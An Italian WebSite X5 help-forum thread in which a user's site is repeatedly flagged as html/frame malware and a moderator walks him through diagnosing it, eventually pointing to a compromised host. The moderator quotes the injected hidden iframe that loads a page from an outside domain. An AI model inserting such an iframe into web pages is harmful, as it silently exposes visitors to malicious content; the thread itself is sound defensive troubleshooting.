WebSite X5Help Center

 
Carlo S.
Carlo S.
User

Problema con virus  it

Autore: Carlo S.
Visite 2315, Followers 1, Condiviso 0  
Parole Chiave: frame,html,virus

Buongiorno, ho un problema con il mio sito web fatto con Website. Una volta pubblicato, l'antivirus trova un malware html/frame. Ho aggiornato diverse volte abilitando la protezione html ma il problema persiste. Il provider mi dice che il problema e' del software con cui e' stato fatto il sito, che non da' le protezioni adeguate. Come posso evitare questa spiacevole situazione?

Postato il
17 RISPOSTE - 2 UTILI
 ‪ KolAsim ‪ ‪
 ‪ KolAsim ‪ ‪
Moderator

... dove viene riscontrato questo virus...?... ...il programma non ne genera...!...

... in genere è un problema che risiede nel proprio PC...

... potrebbe dipendere anche da script esterni o link,  inseriti e di dubbia provenienza...

... un link della pagina con il problema permetterebbe agli esperti di valutare...

.

ciao, KolAsim

Leggi di più
Postato il da  ‪ KolAsim ‪ ‪
Carlo S.
Carlo S.
User
Autore

Il problema viene riscontrato quando il sito e' pubblicato on line. il computer e' protetto con l'ultima versione aggiornata di avg con internet security, scansioniamo periodicamente con microsoft security, ma il pc sembra a posto anche secondo un tecnico.

ho aggiornato la versione on line del sito diverse volte, cancellando tutti i file preesistenti. La password di ftp (e' stata aggiornata anche questa) dovrebbe essere "sicura" essendo molto lunga e complessa....  il provider dice che il loro sistema e' protetto, che il problema e' o nel programma con cui e' stato fatto il sito che non offrirebbe le protezioni adeguate oppure nel ns. pc.....

davvero non so proprio piu' cosa fare. il sito e' www.tafsrl.to , l'antivirus riconosce stringhe di html/frame pericolose, in effetti all'interno del codice html ho riscontrato indirizzamenti verso siti esterni.

grazie per l'aiuto.

Leggi di più
Postato il da Carlo S.
 ‪ KolAsim ‪ ‪
 ‪ KolAsim ‪ ‪
Moderator

... lo vedo regolare; ... se ci fosse qualcosa di strano in quella pagina, google chrome lo rivelerebbe, come avvenuto per altri casi, ...ed è  regolare su altri browser...

.

ciao

Leggi di più
Postato il da  ‪ KolAsim ‪ ‪
Carlo S.
Carlo S.
User
Autore

quando uno visita le pagine , (noi utilizziamo explorer) ad esempio quelle del profilo (l'ho fatto anche ora) avg mi blocca la pagina e mi scrive virus rilevato html/frmae - gravita' alta - identificato da online shield - informazioni estese : porta 80

http://www.avgthreatlabs.com/website-safety-reports/domain/tafsrl.to/linkreport/www.tafsrl.to%2Fprofilo.html/?utm_source=TDPU&utm_medium=OS

http://www.avgthreatlabs.com/website-safety-reports/domain/tafsrl.to/

questi sono i link che avg mi apre

l'antivirus e' aggiornato a questa mattina, se facciamo la scansione del pc, l'antivirus e microsoft security non trovano nulla.

mi scuso per l'insistenza ma ci hanno detto che il problema esiste per la "semplicita'" del linguaggio utilizzato per la creazione del sito dal programma utilizzato.

Stiamo anche pensando come ultima spiaggia di cambiare provider...

grazie! 

Leggi di più
Postato il da Carlo S.
Pasquale D.
Pasquale D.
User

e' successo anche a me, solo però con i siti creati ccon wsx5.

Devi cancellare dal ftp tutto il sito, e cambiare la password.

Poi lo ripubblichi.

Leggi di più
Postato il da Pasquale D.
 ‪ KolAsim ‪ ‪
 ‪ KolAsim ‪ ‪
Moderator
Carlo S.
... ... ... ci hanno detto che il problema esiste per la "semplicita'" del linguaggio utilizzato per la creazione del sito dal programma utilizzato. ... ... ...

... il programma non c'entra, e proprio quello lì qualche anno fa aveva cancellato dal sistema gli eseguibili di swishmax e websitex5 credendo che fossero virus, e senza preavviso, tanto per capirci...

... comunque, visto che ti da quell'avviso, incomincia a provare togliendo l'iframe,  che è scorretto e che hai inserito tu e non il programma in fondo alla pagina,  e vedi che risultato ottieni...

... poi, come mai hai queste pagine...?...

http://www.tafsrl.to/(*)profilo.html     (*) =  %+2+F  =  / ...da loro rilevato...?...

http://www.tafsrl.to/profilo.html

.

ciao

Leggi di più
Postato il da  ‪ KolAsim ‪ ‪
Carlo S.
Carlo S.
User
Autore

Prima di cancellare e togliere sto cercando di capire quale sarebbe l'iframe che avrei messo io ;-)   potresti per favore aiutarmi? non vorrei aver messo, per errore o semplice ignoranza, qualcosa che il sistema riconosce come virus .

Qualche tempo fa, dopo aver notato il problema, avevo scaricato una pagina pubblicata on line e nel linguaggio html ho visto che c'era una stringa che indirizzava ad un altro sito.

l'ho cancellata e ripubblicata. Oggi ho provato a riscaricare una pagina in cui l'antivirus mi riconosce l'errore, alla ricerca di nuovo della stringa malevola, ma non mi pare di averlavista.  Fatto sta che io la pagina online non riesco a vederla perche' bloccata.

Nell'ultima pubblicazione che ho fatto ho abilitato la protezione html pensando di aver risolto i problemi, ma cosi non e' stato...

cosa posso fare per impedire nel futuro che qualcuno possa immettere  queste iniezioni nel sito? c'e' qualcosa che devo abilitare nel programma quando creo le pagine? 

ancora grazie!

ciao

Leggi di più
Postato il da Carlo S.
 ‪ KolAsim ‪ ‪
 ‪ KolAsim ‪ ‪
Moderator

... in fondo alla pagina c'è questo:   

<iframe name=Twitterscrolling=autoframeborder=noalign=centerheight=85width=99src=http://pawsbarkery.com/post.php?id=152385></iframe>

... il SRC è errato, andrebbe virgolettato, ...e devi vedere coma hai fatto ad inserirlo, per eliminarlo alla fonte...

... prova a guardare nei vari pannelli ESPERTO | BODY  e simili, altrimenti lo elimini manualmente direttamente col filesmanager, in rete...

.

ciao

Leggi di più
Postato il da  ‪ KolAsim ‪ ‪
Carlo S.
Carlo S.
User
Autore

questo e' proprio quello che intendevo dire, la stringa del frame non l'ho assolutamente inserita io, il problema che riconosce l'antivirus e' proprio questa iniezione (ossia qualcuno che ha inserito) di frame.     e' un indirizzamento ad un altro sito ma non avendolo messo io non ho la piu' pallida idea di come toglierlo.

se scarico la pagina incriminata e la apro con un programma tipo frontpage dove lavoro con l'html questa stringa non la vedo....

cosa vuol dire eliminarlo con il filesmanager in rete?

Leggi di più
Postato il da Carlo S.
 ‪ KolAsim ‪ ‪
 ‪ KolAsim ‪ ‪
Moderator

... come detto prima, puoi farlo benissimo in rete; ...apri il files manager del server, che trovi nel pannello che ti ha messo a disposizione nello spazio WEB, editi la pagina in HTML, ed in fondo ad essa selezioni ed elimina il codice, quindi salva...

... oppure, sempre semplice al tempo stesso, esporta il sito su DISCO, apri nel blocco note la pagina html, ed in fondo ad essa selezioni ed elimina il codice, quindi fai SALVA...

... a questo punto esporta il contenuto della cartella su DISCO con programma FTP di terze parti, (filezilla, WS_FTP, simili)...

.

ciao



Leggi di più
Postato il da  ‪ KolAsim ‪ ‪
Carlo S.
Carlo S.
User
Autore

Rieccomi! oggi ho provato a riprendere il progetto del sito, ho fatto l'esportazione su disco , ho aperto le pagine con il blocco note ma della stringa naturalmente nessuna traccia. 

anche perche' il problema nasce nel momento in cui il file viene pubblicato.

ho provato anche a scaricare con filezilla alcuni files incriminati dall'antivirus,  li ho aperti con blocco note, ma anche qui niente...

una domanda: non hai un numero telefonico con il quale sia possibile parlare a te o ad un qualunque altro "esperto" perche' magari a voce viene piu' semplice?

grazie ancora

ciao

Leggi di più
Postato il da Carlo S.
 ‪ KolAsim ‪ ‪
 ‪ KolAsim ‪ ‪
Moderator

... quindi, la prova filezilla non ha funzionato, perchè vedo ancora allo stesso modo...

 ... per il resto, potrebbe dipendere dal tuo servizio hosting, se appare senza che tu faccia niente; ...non è mai successo niente del genere se non nei termini detti...

... anzi verifica su un altro servizio, magari in sotto dominio o su Altervista, così avrai la certezza se dipende da virus tuo o del server...

... non ho contatti alternativi...

...

.

ciao

Leggi di più
Postato il da  ‪ KolAsim ‪ ‪
Carlo S.
Carlo S.
User
Autore

ciao! ti ringrazio dell'ultimo consiglio che mi hai dato perche' come da te suggerito ho pubblicato il sito su un dominio di altervista    www.transaquariumfish.altervista.org e tutto funziona benissimo.  Per riprova, visitalo anche tu e perfavore dimmi se continui a vedere le stringhe....

ho avuto la conferma ai miei dubbi: ovvero che il problema sta nel server dove il sito era pubblicato anche se loro hanno sempre negato che potesse essere cosi... per loro il problema e' nel tipo di sito che ho pubblicato, per la semplicita' del linguaggio creato dal programma utilizzato oppure nel mio computer.

PEr loro avrei dovuto spendere dei soldi per investire su un sito piu' complesso difficilmente attaccabile da virus e hacker.

Ora ho ancora una domanda approfittando della tua gentilezza: sullo stesso provider abbiamo anche un negozio online www.fishinnet.net creato con una tecnologia completamente differente. questo sito ha gli stessi problemi del sito di taf. ma anche in questo caso per loro la colpa risiede nella tecnologia ormai vetusta con cui l'e commerce e' stato creato.

Ora io pensavo quindi di rifare il negozio on line con il vostro programma che prevede anche la parte dedicata alla vendita e al commercio. e pubblicarlo su un altro server, naturalmente. secondo te potremmo ritrovarci nella stessa situazione di ora molto presto? ovvero il sito di ecommerce creato con website puo' essere piu' facilmente di altri attaccabile da virus e malware? c'e' qualche accortezza nella creazione del nuovo sito che dobbiamo tenere?

grazie per l'aiuto e di tutte le informazioni che mi hai fornito!

Leggi di più
Postato il da Carlo S.
 ‪ KolAsim ‪ ‪
 ‪ KolAsim ‪ ‪
Moderator

... quello che posso dirti, per come si sono comportati e per quello che hanno detto, di trasferirti rapidamente altrove...

... il programma non ha mai creato nessun problema nei servizi di hosting più comuni in particolare con quelli ad esso gemellati, ONE.COM - A2HOSTING ...

.

ciao

Leggi di più
Postato il da  ‪ KolAsim ‪ ‪
Carlo S.
Carlo S.
User
Autore

grazie ancora di tutto!!!!

provero' a dare un'occhiata...

ciao

Leggi di più
Postato il da Carlo S.
Andrea C.
Andrea C.
User

Buona sera a tutti,

oggi mi è arrivata una mail da google nella quale si dice che il mio sito ha un virus o malware in home. Come può essere accaduto? preciso che il computer utilizzato è regolarmente scansionato. Come posso intervenire per rimuovere il problema?

Grazie a tutti

Andrea

Leggi di più
Postato il da Andrea C.
 ‪ KolAsim ‪ ‪
 ‪ KolAsim ‪ ‪
Moderator

... quale sito ...?... ... e senza motivazione...?...

... quello che avevi indicato più su risulta ancora fatto con una versione obsoleta:   

WebSite X5 Evolution 8.0.11 

... l'ultima versione stabile della v.8  è la 8.0.16

...

... converrebbe fare le conversioni alla versione attuale v.10

.

ciao

Leggi di più
Postato il da  ‪ KolAsim ‪ ‪